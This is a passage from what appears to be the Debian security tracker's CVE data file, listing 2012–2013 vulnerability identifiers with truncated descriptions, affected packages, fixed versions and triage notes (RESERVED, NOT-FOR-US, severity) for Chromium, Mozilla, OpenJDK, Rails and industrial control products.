	- chromium-browser 24.0.1312.68-1
CVE-2013-0841 (Array index error in the content-blocking functionality in Google ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0840 (Google Chrome before 24.0.1312.56 does not validate URLs during the ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0839 (Use-after-free vulnerability in Google Chrome before 24.0.1312.56 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0838 (Google Chrome before 24.0.1312.52 on Linux uses weak permissions for ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0837 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0836 (Google V8 before 3.14.5.3, as used in Google Chrome before ...)
	- chromium-browser 24.0.1312.68-1
	- libv8 (bug #702261; vulnerability was fixed by reverting to old implementation as found in version 3.8.9.20)
	TODO: re-check uploads newer than 3.8.9.20
CVE-2013-0835 (Unspecified vulnerability in the Geolocation implementation in Google ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0834 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0833 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0832 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0831 (Directory traversal vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0830 (The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a ...)
	- chromium-browser (Only affects Windows)
CVE-2013-0829 (Google Chrome before 24.0.1312.52 does not properly maintain database ...)
	- chromium-browser 24.0.1312.68-1
CVE-2013-0828 (The PDF functionality in Google Chrome before 24.0.1312.52 does not ...)
	- chromium-browser (PDF functionality not available in Chromium)
CVE-2012-6498 (Unrestricted file upload vulnerability in index.php in Atomymaxsite ...)
	NOT-FOR-US: Atomymaxsite
CVE-2013-0827
	RESERVED
CVE-2013-0826
	RESERVED
CVE-2013-0825
	RESERVED
CVE-2013-0824
	RESERVED
CVE-2013-0823
	RESERVED
CVE-2013-0822
	RESERVED
CVE-2013-0821
	RESERVED
CVE-2013-0820
	RESERVED
CVE-2013-0819
	RESERVED
CVE-2013-0818
	RESERVED
CVE-2013-0817
	RESERVED
CVE-2013-0816
	RESERVED
CVE-2013-0815
	RESERVED
CVE-2013-0814
	RESERVED
CVE-2013-0813
	RESERVED
CVE-2013-0812
	RESERVED
CVE-2013-0811 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0810
	RESERVED
CVE-2013-0809 (Unspecified vulnerability in the 2D component in the Java Runtime ...)
	- openjdk-6 6b27-1.12.4-1
	- openjdk-7 7u3-2.1.7-1
CVE-2013-0808
	RESERVED
CVE-2013-0807
	RESERVED
CVE-2013-0806
	RESERVED
CVE-2013-0805
	RESERVED
CVE-2013-0804 (The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before ...)
	NOT-FOR-US: GroupWise
CVE-2013-0803
	RESERVED
CVE-2012-6497 (The Authlogic gem for Ruby on Rails, when used with certain versions ...)
	{DSA-2597-1}
	- ruby-activerecord-3.2 3.2.6-3
	- ruby-activerecord-2.3 2.3.14-3
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2012-6496 (SQL injection vulnerability in the Active Record component in Ruby on ...)
	{DSA-2597-1}
	- ruby-activerecord-3.2 3.2.6-3
	- ruby-activerecord-2.3 2.3.14-3
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-0802
	RESERVED
CVE-2013-0801 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-0800 (Integer signedness error in the pixman_fill_sse2 function in ...)
	- iceweasel 17.0.5esr-1
	- icedove 17.0.5-1
	- iceape
	- wine-gecko-1.4 (unimportant)
	NOTE: The description is misleading: Firefox embeds a copy of Cairo, the interdiff
	NOTE: shows the respective change at mozilla-esr17/gfx/cairo/cairo/src/cairo-image-surface.c
	NOTE: Apparently the forked copy has changed, the code isn't present in vanilla Cairo
CVE-2013-0799 (Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox ...)
	- iceweasel (Only affects Firefox on Windows)
CVE-2013-0798 (Mozilla Firefox before 20.0 on Android uses world-writable and ...)
	- iceweasel (Only affects Firefox on Android)
CVE-2013-0797 (Untrusted search path vulnerability in the Mozilla Updater in Mozilla ...)
	- iceweasel (Only affects Firefox on Windows)
CVE-2013-0796 (The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x ...)
	- iceweasel 17.0.5esr-1
	- icedove 17.0.5-1
	- iceape
CVE-2013-0795 (The System Only Wrapper (SOW) implementation in Mozilla Firefox before ...)
	- icedove
	- iceape
	- iceweasel 17.0.5esr-1
CVE-2013-0794 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent ...)
	- iceweasel 17.0.5esr-1 (low)
	- iceape (low)
CVE-2013-0793 (Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, ...)
	- iceweasel 17.0.5esr-1
	- icedove 17.0.5-1
	- iceape
CVE-2013-0792 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17, when ...)
	- iceweasel 17.0.5esr-1 (low)
	- iceape (low)
CVE-2013-0791 (The CERT_DecodeCertPackage function in Mozilla Network Security ...)
	- nss 2:3.14.3-1 (unimportant)
	NOTE: client crash only
CVE-2013-0790 (Unspecified vulnerability in the browser engine in Mozilla Firefox ...)
	- iceweasel (Only affects Firefox on Android)
CVE-2013-0789 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox 19)
	- icedove (Only affects Firefox 19)
	- iceape (Only affects Firefox 19)
CVE-2013-0788 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 17.0.5esr-1
	- iceape
	- icedove 17.0.5-1
CVE-2013-0787 (Use-after-free vulnerability in the nsEditor::IsPreformatted function ...)
	- iceweasel 17.0.5esr-1
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0.2-1, update when it enters unstable
CVE-2013-0786 (The Bugzilla::Search::build_subselect function in Bugzilla 2.x and 3.x ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
CVE-2013-0785 (Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
CVE-2013-0784 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0783 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0782 (Heap-based buffer overflow in the nsSaveAsCharset::DoCharsetConversion ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0781 (Use-after-free vulnerability in the nsPrintEngine::CommonPrint ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0780 (Use-after-free vulnerability in the ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0779 (The nsCodingStateMachine::NextState function in Mozilla Firefox before ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0778 (The ClusterIterator::NextCluster function in Mozilla Firefox before ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0777 (Use-after-free vulnerability in the nsDisplayBoxShadowOuter::Paint ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0776 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0775 (Use-after-free vulnerability in the ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0774 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, ...)
	- iceape (Introduced in Firefox 15)
	- iceweasel (Introduced in Firefox 15)
	- icedove (Introduced in Firefox 15)
CVE-2013-0773 (The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) ...)
	- iceweasel 17.0.5esr-1 (bug #703071)
	- icedove 17.0.5-1
	- iceape
	NOTE: Fixed in experimental in 19.0-1, update when it enters unstable
CVE-2013-0772 (The RasterImage::DrawFrameTo function in Mozilla Firefox before 19.0, ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0771 (Heap-based buffer overflow in the ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0770 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0769 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0768 (Stack-based buffer overflow in the Canvas implementation in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0767 (The nsSVGPathElement::GetPathLengthScale function in Mozilla Firefox ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0766 (Use-after-free vulnerability in the ~nsHTMLEditRules implementation in ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0765 (Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0764 (The nsSOCKSSocketInfo::ConnectToProxy function in Mozilla Firefox ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0763 (Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0762 (Use-after-free vulnerability in the imgRequest::OnStopFrame function ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0761 (Use-after-free vulnerability in the ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0760 (Buffer overflow in the CharDistributionAnalysis::HandleOneChar ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0759 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0758 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0757 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0756 (Use-after-free vulnerability in the obj_toSource function in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0755 (Use-after-free vulnerability in the mozVibrate implementation in the ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0754 (Use-after-free vulnerability in the ListenerManager implementation in ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0753 (Use-after-free vulnerability in the serializeToStream implementation ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0752 (Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0751 (Mozilla Firefox before 18.0 on Android and SeaMonkey before 2.15 do ...)
	- iceape (Android-specific)
	- iceweasel (Android-specific)
	- icedove (Android-specific)
CVE-2013-0750 (Integer overflow in the JavaScript implementation in Mozilla Firefox ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0749 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0748 (The XBL.__proto__.toString implementation in Mozilla Firefox before ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0747 (The gPluginHandler.handleEvent function in the plugin handler in ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0746 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0745 (The AutoWrapperChanger class in Mozilla Firefox before 18.0, Firefox ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0744 (Use-after-free vulnerability in the ...)
	- iceweasel 10.0.12esr-1
	- icedove 10.0.12-1
	- iceape 2.7.12-1
CVE-2013-0743 [nss: Dis-trust TURKTRUST mis-issued *.google.com certificate]
	REJECTED
	{DSA-2599-1}
	- nss 2:3.14.1.with.ckbi.1.93-1
	[wheezy] - nss 2:3.13.6-2
	NOTE: http://googleonlinesecurity.blogspot.in/2013/01/enhancing-digital-certificate-security.html
	NOTE: https://blog.mozilla.org/security/2013/01/03/revoking-trust-in-two-turktrust-certficates/
CVE-2013-0742
	RESERVED
CVE-2013-0741
	RESERVED
CVE-2013-0740
	RESERVED
CVE-2013-0739
	RESERVED
CVE-2013-0738
	RESERVED
CVE-2013-0737
	RESERVED
CVE-2013-0736
	RESERVED
CVE-2013-0735
	RESERVED
CVE-2013-0734
	RESERVED
CVE-2013-0733
	RESERVED
CVE-2013-0732
	RESERVED
CVE-2013-0731 (ajax.functions.php in the MailUp plugin before 1.3.3 for WordPress ...)
	NOT-FOR-US: MailUp plugin for Wordpress
CVE-2013-0730 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x ...)
	NOT-FOR-US: Newscoop
CVE-2013-0729
	RESERVED
CVE-2013-0728 (Multiple stack-based buffer overflows in NCSAddOn.dll in the ERDAS ...)
	NOT-FOR-US: ERDAS ECWP Browser Plugin
CVE-2013-0727 (Multiple untrusted search path vulnerabilities in Global Mapper 14.1.0 ...)
	NOT-FOR-US: Global Mapper
CVE-2013-0726 (Stack-based buffer overflow in the ERM_convert_to_correct_webpath ...)
	NOT-FOR-US: ERDAS ER Viewer
CVE-2013-0725
	RESERVED
CVE-2013-0724
	RESERVED
CVE-2013-0723
	RESERVED
CVE-2013-0722 (Stack-based buffer overflow in the scan_load_hosts function in ...)
	- ettercap 1:0.7.5.1-2 (low; bug #697987)
	[squeeze] - ettercap 1:0.7.3-2.1+squeeze1
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/10/2
	NOTE: http://www.exploit-db.com/exploits/23945/
	NOTE: https://secunia.com/advisories/51731/
	NOTE: Proposed patch http://www.securation.com/files/2013/01/ec.patch
CVE-2012-6495 (Multiple directory traversal vulnerabilities in the (1) twikidraw ...)
	{DSA-2593-1}
	- moin 1.9.5-3
	[wheezy] - moin 1.9.4-8+deb7u1
CVE-2012-6494
	RESERVED
CVE-2012-6493
	RESERVED
CVE-2012-6492
	RESERVED
CVE-2012-6491
	RESERVED
CVE-2012-6490
	RESERVED
CVE-2012-6489
	RESERVED
CVE-2012-6488
	RESERVED
CVE-2012-6487
	RESERVED
CVE-2012-6486
	RESERVED
CVE-2012-6485
	RESERVED
CVE-2012-6484
	RESERVED
CVE-2012-6483
	RESERVED
CVE-2012-6482
	RESERVED
CVE-2012-6481
	RESERVED
CVE-2012-6480
	RESERVED
CVE-2012-6479
	RESERVED
CVE-2012-6478
	RESERVED
CVE-2012-6477
	RESERVED
CVE-2012-6476
	RESERVED
CVE-2012-6475
	RESERVED
CVE-2012-6474
	RESERVED
CVE-2012-6473
	RESERVED
CVE-2013-0721 (wp-php-widget.php in the WP PHP widget plugin 1.0.2 for WordPress ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-0720 (The COBIME application before 0.9.4 for Android uses weak permissions ...)
	NOT-FOR-US: COBIME
CVE-2013-0719 (The ArtIME Japanese Input application 1.1.2 and earlier for Android ...)
	NOT-FOR-US: ArtIME Japanese Input application
CVE-2013-0718 (The Simeji application 4.8.1 and earlier for Android uses weak ...)
	NOT-FOR-US: Simeji
CVE-2013-0717 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: NEC Aterm routers
CVE-2013-0716 (The web server in Wind River VxWorks 5.5 through 6.9 allows remote ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0715 (The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0714 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0713 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0712 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0711 (IPSSH (aka the SSH server) in Wind River VxWorks 6.5 through 6.9 ...)
	NOT-FOR-US: Wind River VxWorks
CVE-2013-0710 (Buffer overflow in Kingsoft Writer 2007 and 2010 before 2724 allows ...)
	NOT-FOR-US: Kingsoft Writer
CVE-2013-0709 (Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows ...)
	NOT-FOR-US: Bayashi dopvSTAR
CVE-2013-0708 (Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows ...)
	NOT-FOR-US: Bayashi dopvCOMET
CVE-2013-0707 (Unspecified vulnerability in JustSystems Ichitaro 2006 and 2007, ...)
	NOT-FOR-US: JustSystems Ichitaro
CVE-2013-0706 (NEC Universal RAID Utility 1.40 Rev 680 and earlier, 2.31 Rev 1492 and ...)
	NOT-FOR-US: NEC Universal RAID Utility
CVE-2013-0705 (Directory traversal vulnerability in LSI 3ware Disk Manager (3DM) ...)
	NOT-FOR-US: LSI 3ware Disk Manager
CVE-2013-0704 (Directory traversal vulnerability in the GREE application before 1.3.3 ...)
	NOT-FOR-US: GREE Android app
CVE-2013-0703 (Cross-site scripting (XSS) vulnerability in imgboard.com imgboard ...)
	NOT-FOR-US: imgboard
CVE-2013-0702 (Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-0701 (SQL injection vulnerability in Cybozu Garoon 2.5.0 through 3.5.3 ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2012-6472 (Opera before 12.12 on UNIX uses weak permissions for the profile ...)
	NOT-FOR-US: Opera
CVE-2012-6471 (Opera before 12.12 allows remote attackers to spoof the address field ...)
	NOT-FOR-US: Opera
CVE-2012-6470 (Opera before 12.12 does not properly allocate memory for GIF images, ...)
	NOT-FOR-US: Opera
CVE-2012-6469 (Opera before 12.11 allows remote attackers to determine the existence ...)
	NOT-FOR-US: Opera
CVE-2012-6468 (Heap-based buffer overflow in Opera before 12.11 allows remote ...)
	NOT-FOR-US: Opera
CVE-2012-6467 (Opera before 12.10 follows Internet shortcuts that are referenced by a ...)
	NOT-FOR-US: Opera
CVE-2012-6466 (Opera before 12.10 does not properly handle incorrect size data in a ...)
	NOT-FOR-US: Opera
CVE-2012-6465 (Opera before 12.10 allows remote attackers to execute arbitrary code ...)
	NOT-FOR-US: Opera
CVE-2012-6464 (Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows ...)
	NOT-FOR-US: Opera
CVE-2012-6463 (Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows ...)
	NOT-FOR-US: Opera
CVE-2012-6462 (Opera before 12.10 does not properly implement the Cross-Origin ...)
	NOT-FOR-US: Opera
CVE-2012-6461 (The X.509 certificate-validation functionality in the https ...)
	NOT-FOR-US: Opera
CVE-2012-6460 (Opera before 11.67 and 12.x before 12.02 allows remote attackers to ...)
	NOT-FOR-US: Opera
CVE-2012-6459 (ConnMan 1.3 on Tizen continues to list the bluetooth service after ...)
	- connman 1.0-1.1 (bug #697580)
	[wheezy] - connman 1.0-1.1+wheezy1
	[squeeze] - connman (Minor issue)
CVE-2012-6458
	RESERVED
CVE-2012-6457
	RESERVED
CVE-2012-6456
	RESERVED
CVE-2012-6455
	RESERVED
CVE-2012-6454
	RESERVED
CVE-2012-6452
	RESERVED
CVE-2012-6451
	RESERVED
CVE-2012-6450
	RESERVED
CVE-2012-6449
	RESERVED
CVE-2012-6448
	RESERVED
CVE-2012-6447
	RESERVED
CVE-2012-6446
	RESERVED
CVE-2012-6445
	RESERVED
CVE-2012-6444
	RESERVED
CVE-2012-6443
	RESERVED
CVE-2012-6453 (Cross-site scripting (XSS) vulnerability in the RSS Reader extension ...)
	{DSA-2596-1}
	- mediawiki-extensions 2.11 (bug #696179)
CVE-2012-6442 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6441 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6440 (The web-server password-authentication functionality in Rockwell ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6439 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6438 (Buffer overflow in Rockwell Automation EtherNet/IP products; ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6437 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6436 (Buffer overflow in Rockwell Automation EtherNet/IP products; ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6435 (Rockwell Automation EtherNet/IP products; 1756-ENBT, 1756-EWEB, ...)
	NOT-FOR-US: Rockwell Automation EtherNet/IP
CVE-2012-6434 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: e107
CVE-2012-6433 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: e107
CVE-2013-0700 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to ...)
	NOT-FOR-US: Siemens SIMATIC
CVE-2013-0699 (The Galil RIO-47100 Pocket PLC allows remote attackers to cause a ...)
	NOT-FOR-US: Galil RIO-47100
CVE-2013-0698
	RESERVED
CVE-2013-0697
	RESERVED
CVE-2013-0696
	RESERVED
CVE-2013-0695
	RESERVED
CVE-2013-0694
	RESERVED
CVE-2013-0693
	RESERVED
CVE-2013-0692
	RESERVED
CVE-2013-0691
	RESERVED
CVE-2013-0690
	RESERVED
CVE-2013-0689
	RESERVED
CVE-2013-0688 (Cross-site scripting (XSS) vulnerability in Invensys Wonderware ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0687 (The installer routine in Schneider Electric MiCOM S1 Studio uses ...)
	NOT-FOR-US: Schneider Electric
CVE-2013-0686 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0685 (Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0684 (SQL injection vulnerability in Invensys Wonderware Information Server ...)
	NOT-FOR-US: Invensys Wonderware Information Server
CVE-2013-0683 (The DataSim and DataPid demonstration clients in Cogent Real-Time ...)
	NOT-FOR-US: DataSim and DataPid demonstration clients
CVE-2013-0682 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0681 (Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0680 (Stack-based buffer overflow in the web server in Cogent Real-Time ...)
	NOT-FOR-US: Cogent DataHub
CVE-2013-0679 (Directory traversal vulnerability in the web server in Siemens WinCC ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0678 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0677 (The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0676 (Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0675 (Buffer overflow in CCEServer (aka the central communications ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0674 (Buffer overflow in the RegReader ActiveX control in Siemens WinCC ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0673 (Directory traversal vulnerability in the web interface in the Health ...)
	NOT-FOR-US: MatrikonOPC
CVE-2013-0672 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0671 (Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0670 (CRLF injection vulnerability in the HMI web application in Siemens ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0669 (The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0668 (Multiple cross-site scripting (XSS) vulnerabilities in the HMI web ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0667 (Cross-site scripting (XSS) vulnerability in the HMI web application in ...)
	NOT-FOR-US: Siemens WinCC
CVE-2013-0666 (The configuration utility in MatrikonOPC Security Gateway 1.0 allows ...)
	NOT-FOR-US: MatrikonOPC
CVE-2013-0665 (Schweitzer Engineering Laboratories (SEL) AcSELerator QuickSet before ...)
	NOT-FOR-US: Schweitzer Engineering Laboratories AcSELerator QuickSet
CVE-2013-0664 (The FactoryCast service on the Schneider Electric Quantum 140NOE77111 ...)
	NOT-FOR-US: Schneider Electric Quantum modules
CVE-2013-0663 (Cross-site request forgery (CSRF) vulnerability on the Schneider ...)
	NOT-FOR-US: Schneider Electric Quantum modules
CVE-2013-0662
	RESERVED
CVE-2013-0661
	RESERVED
CVE-2013-0660
	RESERVED
CVE-2013-0659 (The debugging feature on the Siemens CP 1604 and CP 1616 interface ...)
	NOT-FOR-US: Siemens Interface Card
CVE-2013-0658 (Heap-based buffer overflow in RFManagerService.exe in Schneider ...)
